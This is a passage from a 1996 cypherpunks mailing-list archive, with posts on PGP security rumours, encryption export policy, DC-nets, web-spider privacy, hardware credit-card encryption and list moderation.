>would be as much a part of the home computer as a floppy disk or a hard drive. 
>
>   And just as consumers have grown accustomed to computers and ATM cards, the
>combination of the two could be another step toward a "cashless" society. 
_______________________
Regards,               If God intended one space between sentences, 
		       why do we have two thumbs?  - ?
Joseph Reagle          http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu         0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 18 Jan 1996 04:54:27 +0800
To: blanc <blancw@accessone.com>
Subject: Re: FW: Net Control is Thought Control
In-Reply-To: <01BAE3A0.1232C6A0@blancw.accessone.com>
Message-ID: <199601170001.QAA18231@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



BW:

>Now, you know that no one either on this list or anywhere in cyberspace =
>is confined, either physically or psychologically, to continuously & =
>unwillingly expose themselves to alt.usenet.kooks or =
>http://www.ho-hum.com or cypherpunks, etc.. 

I have already conceded this point. hence there is definitely a difference
between "coercive persuasion" and "persuasion". but my point is that
there are other shades of "persuasion" that still have the smell of
brainwashing and propaganda techniques (even though they aren't "coercive"
in the sense there is a prisoner involved).
 
>A person in an unrestricted setting, who is so easily persuaded by =
>others that they cannot resist being influenced, has a lot of work to do =
>in finding out about their own lack of self-confidence & direction. 

but humans are subject to influence no matter how paranoid they are
about being influenced. its a basic human instinct. that's my point.
peer pressure always arises in all groups, not because humans are
malicious, but because they are humans, and humans are social animals.
(perhaps you consider yourself an exception to this rule)

>  A =
>"victim of information" must study & discover the difference between =
>valid info & dangerous nonsense.  There are ways to know when someone is =
>trying to supplant one's own initiative with their own preferences. =20

then why can entire societies fall victim, such as Nazi germany?
answer: because individuals are fallible. and unlike you, I don't 
necessarily blame the victim if they fall victim to extremely sophisticated
brainwashing techniques.

>And here's plenty of debate & unrestricted flaming in cyberspace to =
>challenge anyone's passive acceptance of another's conclusions (or of =
>their own unexamined presumptions).  And there's always new software =
>tools to enable participants to make a quick exit if they feel =
>uncomfortable with a conversation.

true, but this has little to do with what I was talking about. my point
was that consensus and its perception (not presence or absence of 
various opinions) is what can be subject to manipulation in cyberspace.

[flamewar manufactured by one person]
>Unless I was thinking of going out to lunch with one of them, I can't =
>isee why I would care.  i.e.,  unless I needed to make a decision for =
>action based on what they had said, it wouldn't really matter to me.  I =
>expect I would have more effect on them than vice-versa.  :>)

it is easy to say you don't care, but this is patently false in the
grand scheme of things. suppose
that 9 of the last 10 flamewars on this list were actually carefully
orchestrated, *manufactured* by a single person interested in making
this point, and teasing people that refused to believe that rampant
dischord can be sown through a barrage of pseudonyms. 
the numerous yellings and screechings on this list are ample evidence 
that most people *do* care about excessive flamewars, and various opinions, 
posted to this list.

how can you be so sure that the cypherpunks lists is really what you 
think it is? a bunch of people from around the country independently
interested in crypto? an agent provacteur, or agent saboteur, could
create a vastly different perception regardless of the input of other
people.

another very interesting effect to measure is the following: if there
is already a lot of mail on a list, people tend to post less. hence,
if someone (individual) littered the list with many pseudonymous posts 
under different names, then people
who might have contributed otherwise could tend not to post. hence
the problem of "real" dialogue is aggravated as a larger percentage of 
pseudonymous posts appear.

don't care? fine by me. (g) just provides a good opportunity for someone to 
work with "willing research subjects".







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Thu, 18 Jan 1996 03:56:20 +0800
To: cypherpunks@toad.com
Subject: Re: new web security product
Message-ID: <199601170021.QAA01255@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger wrote: 
> I don't think its going to fly. No one wants to pay for an unneeded
> $100 piece of hardware to encrypt the same credit card over and over
> again, when a nearly zero marginal cost piece of software can do the
> same thing.

I agree with Perry. Hardware encryption does add a layer of security 
not normally found in software, but it is hardware.

Shoot, I don't even have a 28.8 modem yet, why would I want a black 
box that supposedly does something with my Credit Cards?

Brad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Jan 1996 01:01:13 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Cybercrime & Privacy Issues AOL FBI discussion
In-Reply-To: <2.2.32.19960116080509.009d98fc@mail.teleport.com>
Message-ID: <199601162133.QAA02541@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



> >On Wednesday evening, January 24, 1996 at 9pm EST in the Globe Auditorium
> >of America Online (AOL), Mobile Office Productions will be hosting a candid
> >interactive discussion with the FBI's Jim Kallstrom, who is working to
> >shape procedures regarding computer privacy issues and cybercrime.

Ah, yes, Jim "I'll say anything to get the FBI its way" Kallstrom. I
remember when he spoke at length about snuff films in public without
flinching during the Clipper debate at the NY Bar Association.

I suspect, of course, that no one will have a chance to call him on
his lies in the line of duty. Too bad.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 18 Jan 1996 00:58:51 +0800
To: cypherpunks@toad.com
Subject: Spiderspace, Privacy & Control
Message-ID: <2.2.32.19960116224108.006ae91c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 AM 1/16/96 -0800, Timothy C. May wrote:
>
>I've been thinking a lot about the problems and opportunities that are
>coming up as more and more "spiders" (Web searchers, crawlers) are indexing
>directories and files on systems they can find.
>
>Second, what is out there in spiderspace is incredibly useful for building
>dossiers, for compiling correlations, and for doing competitive analyses.

All of these capabilities might seem to increase the control opportunities
of others but for the fact that our opportunities for independent
interaction have increased much faster.

All the modern control technologies have been blown out of the water because
of the single significant fact that a network creates more connections than
anyone else can block.  And this is true whether that network is called a
"market" or an "Internet."  

Liberty can be defined as an opportunity to complete "transactions."
Control may be defined as the capability to block another from completing
"transactions."  The "lowest chained serf in the fields" has few
opportunities to complete "transactions" or to make choices.  Even if his
legal status were different, the fact that he is bound to the soil by
necessity if not law restrains his liberty.  He can't go anywhere or do
anything.  If he is in a lightly populated place like the Northern Europe of
old, his "world" contains about 100 people.  If he is in a densely populated
place like a Chinese river valley he still only has about 1000 people in his
village to deal with.  Nature constrains his choices so much that only a
minor effort by "society" is required to completely restrain him.

A modern market and a modern telecoms infrastructure is so vast and is made
up of so many potential links that it takes a major and very expensive
application of human force to even slightly restrain other people.  Since
each of us can buy  from or sell to, talk to, form attachments with
literally millions (and soon billions) of other people (and companies and
software robots, etc) the opportunities for others to control us are
limited.  Very expensive prisons, criminal justice systems, credit bureaus,
and employment records systems are inadequate to keep us from doing much of
what we want.  Which is why an allegedly "controlled" world seems a lot less
controlled than the world of the past.

Among all of the potential "transactions" that we can choose to complete (T)
are a subset of transactions (t) that give us outcomes closer to what we
actually want.  In the past, the best representation of this transaction
space was T=t=1.  The total transactions were very limited (subsistence
farming in the place and among the people of our birth).  We were stuck.
Today we are approaching a situation in which for all practical purposes T=~
and t=~ and the all of the possibilities make the match between what we want
and what we can get very close.

So if one government or one employer or one friend is not "right" for us,
there are millions more where that came from.  We aren't there yet but we
are getting there.  No matter how peculiar your exact nature, there are so
many markets and people out there that very few people on earth will be
unable to find a niche.

If your needs are esoteric, you may have to shop around a bit but all these
great search tools sure make that easier.

Thus if I write something that upsets a government or an employer, there are
other governments and other employers (including myself in both cases).  In
fact, I am likely to find some "small, deeply disturbed following" that
actually likes what I have to say.  There are an awful lot of people out there.

It's like the Bill Mauldin cartoon featuring a skinny, ugly, GI with a funny
big curl on his head driving through an Italian hill town full of ugly,
skinny people with giant curls on their heads -- "Gee, my Daddy told me I'd
find a place like this."  That village is already part of Market Earth (tm)
and is (or soon will be on the Net).

With the millions of choices each of us has, restricting those choices
quickly becomes impossible outside of prison and prisons become ever harder
to maintain because of cost and countermeasures.  (The Soviet Union, for
example).

DCF

"An ISP that restricts access isn't an *Internet* Service Provider but
rather a proprietary online service."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Thu, 18 Jan 1996 03:57:53 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: Better diversity through Perrymoose.
In-Reply-To: <199601162143.QAA05083@nrk.com>
Message-ID: <Pine.SUN.3.91.960116180910.13597H-100000@amanda>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Jan 1996, David Lesher wrote:

> Can't we just solve the problem by making it a moderated list; 
> and make Perry the moderator?
> 

SHIT NO!  NO NO NO NO NO!  NO WAY IN HELL NO!  :)  Cypherpunks will NOT 
be moderated.  Filtered, spindled and stapled, but never moderated.

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 18 Jan 1996 00:52:05 +0800
To: pitz@onetouch.com
Subject: Re: pgp broken?
In-Reply-To: <9601162346.AA22192@toad.com>
Message-ID: <199601170016.TAA25341@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Although there is always the possibility that PGP could be broken, it
is highly unlikely that the program as a whole has been broken.  I
would think that it would be much easier to attempt to guess someone's
passphrase than to brute-force the crypto in the program.

Also, if it is the DoD that is purporting this supposed break, I doubt
the public will ever hear about it.  It would be interesting to know
"how" PGP was supposedly broken.  Was a cryptographic routine broken,
or was it a user interface break?  I.e., was a signature forged or a
message decrypted?  Or was an old message replayed as a new one?

Also, it could be that a small PGP key has been broken.  A 384-bit PGP
key has already been broken by a factoring attack.  That is neither
surprising nor alarming to say the least.  Without more information it
really is impossible to analyze what happened.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patiwat Panurach  (akira rising)" <pati@ipied.tu.ac.th>
Date: Thu, 18 Jan 1996 09:09:29 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Offshore Banks and Asset Protection
In-Reply-To: <ad1c4cad210210045dc1@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960116194226.12199G-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jan 1996, Timothy C. May wrote:

> At 8:57 PM 1/12/96, Rich Graves wrote:
> >Every issue of The Economist (and I'm sure lots of other publications)
> >has ads for this kind of thing.

And The Economist wisely puts notices warning readers to use there own
discretion on such services.  Great mag, it gave some of the best and 
sanest articles on the internet ever printed in the "popular press".

> >Anyone know a reference for ranking the "legitimacy" of these services
> >and seminars? I'd assume that many of them are scams that will gladly
> >take your money overseas, but you might never see it again.
> 
> I looked into "asset protection" [see note below] using offshore banks
> (Carribean, Channel Islands, Europe, etc.), and bought a couple of books on
> this. And I subscribed to some Net newsletters. I'm not an expert, and have
> not chosen (yet) to "protect" my assets by moving them offshore.
> 
> "tax sheltering" (or "tax evasion"). The idea is to put assets beyond the
> reach of tort judgments. For example, a doctor may fear the incredibly
> large "deep pockets" lawsuits that American society encourages, so he
> transfers a large fraction of his net worth to an offshore bank. He reports

Beside there rather ambigous value as "asset protection" and "tax
sheltering", the main reason people use offshore banking is to gain better
interest rates.

In Thailand, the Bangkok International Banking Facility offers interest
rates on deposits that are several percentages higher than normal banks. 
The banks of the facility work under a different set of banking laws from
normal banks.  Also, the interest rate on loans also tends to be lower. 
I'm not sure whether international funds are subject to local (thai) or
international (us) tort judgements though, but many of the banks in the
BiBF advertise to offer high privacy and security. 

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 18 Jan 1996 14:08:59 +0800
To: cypherpunks@toad.com
Subject: Re: Information Sent by Netscape during Queries
Message-ID: <199601161954.UAA19735@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:

> > 3) Can we go completely stealth inside of Netscape without a proxy server?

>   No.  Right now you can't disable cookies, you can't disable
> referer, and you can't mask your IP address.

But on Unix systems, at least, you can make "referer" more difficult
for nosy servers to use -- subject to the "applicable laws" where you
live.  (The license agreement says, "...you agree not to modify the
Software ... except to the extent [that] applicable laws specifically
prohibit such restriction.")

Just back up your Netscape executable, then load it into Emacs (or any
editor which can handle arbitrary binary files), search for the "Referer:"
string, and change it to an appropriate string of the same length.

"MYOB:   " sounds like an appropriate string to me...



-----//----------------------------------------------------------------
Please note: This message has been anonymized on request of its sender.
If you would prefer not to receive anonymous mails from this machine,
please contact postmaster@bi-node.zerberus.de and say so.
For further information regarding this service, please send mail
to remailer@bi-node.zerberus.de with subject 'remailer-help'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Thu, 18 Jan 1996 07:09:07 +0800
To: cypherpunks@toad.com
Subject: Scientic American
Message-ID: <Pine.OSF.3.91.960116232509.6134A-100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



The latest issue of SA has a small piece in zero knowledge transactions 
in the Math Rec section.

Dan
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Thu, 18 Jan 1996 06:59:06 +0800
To: wlkngowl@unix.asb.com
Subject: RE: Alta Vista, Great Stuff!
Message-ID: <0099C7F3.921D3B60.3@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


In Article: <199601170427.XAA27753@UNiX.asb.com>, Beethoven <wlkngowl@unix.asb.com> wrote:

# Hey, I saw a message on the list about personal mail
# showing up in an A.V. search, and figured why not try
# it out and see what comes up under one of my nyms...

# Lo and behold, my nym corresponds with the title of a
# popular comic strip and an episode in a bad TV show...

# Crypto related?

# Imagine your nym is related to something common-place at
# the time of posting.  Even though you may be well known
# under that nym, simple searches for that name will turn up
# loads of crapola, or at least some light entertainment
# for someone searching for oyur past posts.

# (It can also turn some unsuspecting people looking for the
# crapola onto your interests...)

# Yes, I know that sophisticated search engines and simple
# expressions can filter out most of the unwanted junk, but
# not all of it.  Likewise filtering will let some of your
# posts fall through the web-crawler-cracks.

I've ran into three similar situations lateley.
1) Quite a few people assume that aztech.com is Aztech Labs, the makers of
various sound cards, video cards, and CD-ROM drives.  (I _wish_ these fols
would use the various search engines to find who/what they're looking for.)

2) I'm hosting a web-page for a band called One Foot In The Grave.  There's a
(fairly popular, I guess) British sit-com by the same name, with quite a few
followers that have set up pages for the TV show.

3) There happens to be a steve@tezcat.com, and we occasionally receive email
from long-lost aquaintances that was intended for the other.  Generally this is
in response to something that either one of us posted to Usenet.

Crypto relevance?  Only on item 3, if PK encryption was in wide-spread use, and
easy to use, this wouldn't happen.  The MUA would realize that it didn't have a
local PK key for steve@tezcat.com, and inform the user (who could then perform
a soundex lookup on their existing keys, and realize that they meant to contact
steve@aztech.com.)

Soundex (or equivilant technology) search spiders are going to make the whole 
mess even worse...

ObPunk: I decided that the easiest way to hide from item 1 was to change domain
names.  By chance, someone else was interested in aztech.com, so I even made a
profit.  :)

I keep meaning to write something up, and submit it to comp.risks, but who has
the time?...

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Thu, 18 Jan 1996 09:37:22 +0800
To: cypherpunks@toad.com
Subject: Base conversion
Message-ID: <9601170548.AA04146@vongole.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


	I am trying to write some code to perform base conversions on
very large numbers (possibly as large as 256^(2^(ULONG_MAX))).
Specifically, I store the numbers in base 256, but I would like to be
able to print them in base 10.  Any really brillant ideas?

-James




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Thu, 18 Jan 1996 04:16:29 +0800
To: bshantz@nwlink.com
Subject: Re: new web security product
Message-ID: <0099C802.AA1011C0.13@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


# Perry Metzger wrote: 
# > I don't think its going to fly. No one wants to pay for an unneeded
# > $100 piece of hardware to encrypt the same credit card over and over
# > again, when a nearly zero marginal cost piece of software can do the
# > same thing.

Merchants might.  Current credit-card processing terminals are increadibly
overpriced for what you get.  $100.00 plus the price of an inexpensive PC, plus
proprietary software isn't too far of the mark, in comparison.

# I agree with Perry. Hardware encryption does add a layer of security 
# not normally found in software, but it is hardware.

I've been a fan of unrelated encryption at each layer of the 7 (5, 4, whatever)
layers,  lateley.  In military/financial terms, the question of "who has access
to what" and "needs to know what" at different levels of the protocol stack
make a big difference.  Network guys should be able to perform traffic
analysis, application guys should be able to debug application-specific
traffic, but not visce versca.

# Shoot, I don't even have a 28.8 modem yet, why would I want a black 
# box that supposedly does something with my Credit Cards?

If you think "Not _my_ credit cards, but my _customers'_...", then it starts to
make sense.

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jan 1996 00:16:21 +0800
To: cypherpunks@toad.com
Subject: DC-Nets and Noise
Message-ID: <ad21e7f60202100476b7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 1/17/96, s1018954@aix2.uottawa.ca wrote:

>(Speaking of sublists, whatever happenned to the DC-net list mentioned in
>the cyphernomicon? Is this a figment of my imagination or was there any code
>written that I might partake of? Btw, why call it a DC network when it is
>really a ring? Maybe I haven't taken a good enough look at the protocol.
>Dinner calls. :> )

Without consulting the Cyphernomicon, my memory is that there were two main
proposals for a DC-Net (Dining Cryptographers Net) mailing list. The first
was by Yanek Martinson, a Russian emigre, circa 1992. The second was by Jim
McCoy, of Austin.

Yanek I have not heard from in a few years. Jim McCoy has also not been
active on our list in at least a year, maybe longer. I recently heard from
Doug Barnes that Jim may be coming to the Bay Area, so things may change.
Neither of these proposed mailing lists seemed to have gotten to a critical
mass.

There are many reasons why mailing lists and subgroups fade out. DC-Nets
are a hard thing to pull off (anyone see any working versions lately?),
about as hard to pull off as true digital cash; and with less economic
benefit, less incentive to do the work. So, I can't say I am, or was,
surprised that such mailing lists atrophied.

An equally interesting question is why the Cypherpunks list has kept on
growing in size, given the nontechnical digressions that some subscribers
so object to. My view, shared by others I think, is that too technical a
list will atrophy...only a handful of folks are usually competent to
contribute, and so message volume drops to only a few messages a day, then
a few per week, then it fades out altogether.

The "noise" that some decry may help to keep lists vital.

(In any case, even for those who disagree, modern filtering techniques make
it trivial for the "gurus" to filter out all messages except by the several
of themselves, so I've never understood the point about how the list must
purge itself of "noise.")

--Tim May




We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 18 Jan 1996 03:19:27 +0800
To: cypherpunks@toad.com
Subject: WP: Encryption rules hurt exporters
Message-ID: <4kzA0im00YUv8xUlh3@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



The Washington Post
January 17, 1996
   
Study: Encryption Rules Hurt Exporters
   
   
   By Elizabeth Corcoran
   Washington Post Staff Writer
   
   
   U.S. export restrictions on technology for encrypting information are
   slowing American companies' success in some foreign countries and
   retarding the growth of an international market for such technology,
   according to a new report released by the U.S. Commerce Department.
   
   The study is likely to become the latest ammunition in the struggle
   between the administration and many U.S. high-tech companies and civil
   liberties advocates over how tightly the United States should control
   the export of sophisticated data scrambling, or encryption,
   technology. Both sides are likely to try to use the report to their
   advantage.
   
   U.S. businesses contend that they are losing market share to foreign
   competitors because they are not allowed to include the most
   sophisticated encryption technology in their software products.
   
   "The day we show lost market share [in the overall market for
   software] is the day that we start losing the whole ballgame," said
   Rebecca Gould, director of policy for the Business Software Alliance.
   
   The report, which was commissioned in late 1994 by the national
   security adviser and carried out by the Commerce Department's Bureau
   of Export Administration and the National Security Agency, aimed to
   assess the impact of encryption export controls. It assigns no dollar
   values to any sales lost by U.S. companies, but notes that there are
   many foreign-made encryption products available overseas. On the other
   hand, some of those products do not work well, the report says.
   
   Still, it cites evidence that U.S firms are not making significant
   progress in the business of selling encryption technology.
   
   In three countries -- Switzerland, Denmark and the United Kingdom --
   market share for U.S. encryption products declined during 1994, the
   report said. Sources in 14 countries said that export controls "limit"
   U.S. market share, while those in another seven countries said such
   controls have "either no impact or no major impact."
   
   Although the report maintains that sources in "most" countries
   indicated that U.S. market share is "keeping pace" with overall
   demand, in many of the countries surveyed, "exportable U.S. encryption
   products are perceived to be of unsatisfactory quality."
   
   Today, a Washington-based policy group supported by a dozen major
   computer companies plans to release its own commentary on export
   encryptions, calling for the government to lift its export
   restrictions.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "greg pitz" <pitz@onetouch.com>
Date: Thu, 18 Jan 1996 00:03:24 +0800
To: cypherpunks@toad.com
Subject: Re: pgp broken?
Message-ID: <9601171542.AA13630@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 16 Jan 96 at 19:16, Derek Atkins wrote:

> Also, it could be that a small PGP key has been broken.  A 384-bit
> PGP key has already been broken by a factoring attack.  That is
> neither surprising nor alarming to say the least.  Without more
> information it really is impossible to analyze what happened.

I focused my interrogation in this direction, because, as many of you 
have pointed out, it is VERY doubtful that PGP itself was "broken".

To give further perspective, he kept claiming that a "triple DES with 
RS4 overlay" was the most secure method of encryption.

>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<
greg pitz                                              pitz@onetouch.com 
>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian C. Lane" <blane@eskimo.com>
Date: Thu, 18 Jan 1996 00:39:17 +0800
To: cypherpunks@toad.com
Subject: Re: A weakness in PGP signatures, and a suggested solution
Message-ID: <199601171613.IAA11904@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > In article <Pine.ULT.3.91.960110182255.18692H-100000@xdm011>, Jeffrey Goldberg <cc047@Cranfield.ac.uk> says:
> 
> But then the recipient has a PGP-signed message from you which
> isn't encrypted (using pgp -d). That person could then impersonate
> you. Eg Alice the jilted lover could resend the goodbye message
> with forged headers to Bob's new girlfriend to get back at him.

  Ah ha! Now I understand what this argument has been all about. This 
is not a flaw with PGP, but with the software doing the signing. It 
should/could add a line with a time and date stamp inside the 
signature envelope, or Bob could add more information, making the 
message more specific.

  I don't think PGP needs to be 'fixed', but the signing software 
does.

   Brian
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMP0gGHIWObr6ZnuNAQFqpQMAhEDxcClXzwqS5QLSYgbGC0SdPwOSppgG
cbEcHEamA+C/fzlCRl1FoCkvA/SPHoZB29FNJSH8hnP6s5OZQfFf3LZXPL+/UFiL
64i7dlt6Ajtg58eDiMj/+qPsHd8hbAuV
=jj8n
-----END PGP SIGNATURE-----
--- <blane@eskimo.com> -------------------- <http://www.eskimo.com/~blane> ---
  Embedded System Programmer, EET Student, Interactive Fiction author (RSN!)
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 18 Jan 1996 04:11:09 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: remarkable recent stories
In-Reply-To: <9601170059.AA24758@sulphur.osf.org>
Message-ID: <199601171326.IAA07807@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


rsaltz:

> Several times I have heard NSA staffers talk about securing our
> secrets vs. reading theirs.  It seems that right now the first
> side is "winning."

This "Chinese Wall" exists in many other branches of the IC.

I saw this in a specific physical security area; Red Team tried to (say)
build a wall; Black Team worked on new ways through it. We (another
agency with an interest in walls) could & did get advice on
wall-building from Red; but the Blacks would not talk to either the Red
Team nor us.

Trying to predict the posture of the Fort _in general_ from the PhilZ
case strikes me as a less accurate than throwing darts blindfolded...
from a rollercoaster.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Thu, 18 Jan 1996 10:05:14 +0800
To: pitz@onetouch.com
Subject: Re: pgp broken?
Message-ID: <9601171631.AA15064@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:42 AM 1/17/96 -8, you wrote:
>On 16 Jan 96 at 19:16, Derek Atkins wrote:

>To give further perspective, he kept claiming that a "triple DES with 
>RS4 overlay" was the most secure method of encryption.

Well, he's wrong.  A one time pad (properly generated and used) is 
provably secure as the "most" secure cipher.  Speaking of "provably", 
ask him if he's sure that "triple DES with an RC4 overlay" is more 
secure than, say, "quintuple DES with an RC4 overlay" (since we're making 
up combinations).  I would be VERY interested in any mathematical proof or 
empirical evidence that putting the RC4 on top of the encryption would be 
more secure than doing it first or between the DES rounds.  Some pretty 
good mathemeticians have failed to produce such sweeping results (for the 
public domain, anyway.) 

Let's see if I have this right.  Someone with access to the internet claims
that 
someone with access to the DOD claims that some cipher system is good and
another 
is bad.  I have no reason to believe you.  You seem to have no reason to
believe 
him.  He does not seem to know what he's talking about, on a subject where a
great 
deal of effort is expended to promote confusion... I think I've got it!







Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 18 Jan 1996 13:22:56 +0800
To: tjm@easynet.co.uk (Terence Joseph Mallon)
Subject: THE RECIPROCAL ?......
In-Reply-To: <v01530504ad22b840b54d@[194.154.96.141]>
Message-ID: <9601171433.AA20281@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Terence Joseph Mallon writes:
 > "When people talk of encryption they use the word break, they are
 > approaching from one way but not the only way. I am at present trying the
 > reciprocal, that is, to mend."

Why do I sometimes feel that personalities that once were drawn to
design of perpetual motion machines or techniques for squaring circles
may very soon flock to cryptographic "research"?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 18 Jan 1996 01:00:18 +0800
To: cypherpunks@toad.com
Subject: Re: DC-Nets and Noise
Message-ID: <v02120d0bad22d5072235@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:38 1/17/96, Timothy C. May wrote:

>There are many reasons why mailing lists and subgroups fade out. DC-Nets
>are a hard thing to pull off (anyone see any working versions lately?),
>about as hard to pull off as true digital cash; and with less economic
>benefit, less incentive to do the work. So, I can't say I am, or was,
>surprised that such mailing lists atrophied.

David Chaum told me last year that someone has created a DC net that works
over AppleTalk. Supposedly, it was mentioned at Eurocrypt. Any pointers?

TIA,


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 18 Jan 1996 07:16:29 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: A Modest Proposal: Fattening up the Proles
In-Reply-To: <ad21ecac030210049202@[205.199.118.202]>
Message-ID: <199601171433.JAA06658@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
  At 2:57 AM 1/17/96, tallpaul wrote (quoting):
> >"To understand the probable outcome of the Libertarian vision, see any
> >cyberpunk B movie wherein thousands of diseased, desparate and starving
> >families sit around on ratty old couches on the streets watching television
> >while rich megalomaniacs appropriate their body parts for their personal
> >physical immortality."

> The absurdity of this point is obvious to anyone with a brain. Why would we
> want the donors to be "diseased" and "starving"?  It is imperative that
> donors be healthy and non-anorexic (we used to use the phrase "fattened
> up," but this is no longer au courant).
> 
> To keep the proles reasonably healthy, the plutocrats are encouraging the
> current wave of exercise videos, ThighMasters, Buns of Steel, etc. And lots
> of beer, as the Kobe beef quakers have shown.

Plus, we'll be feeding them tasty and nutritious Soylent Green(tm)...


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@tssun5.dsccc.com (Ed Carp @ TSSUN5)
Date: Thu, 18 Jan 1996 00:02:44 +0800
To: cypherpunks@toad.com
Subject: Re: Alta Vista searches WHAT?!?
Message-ID: <9601171537.AA07968@tssun5.>
MIME-Version: 1.0
Content-Type: text/plain



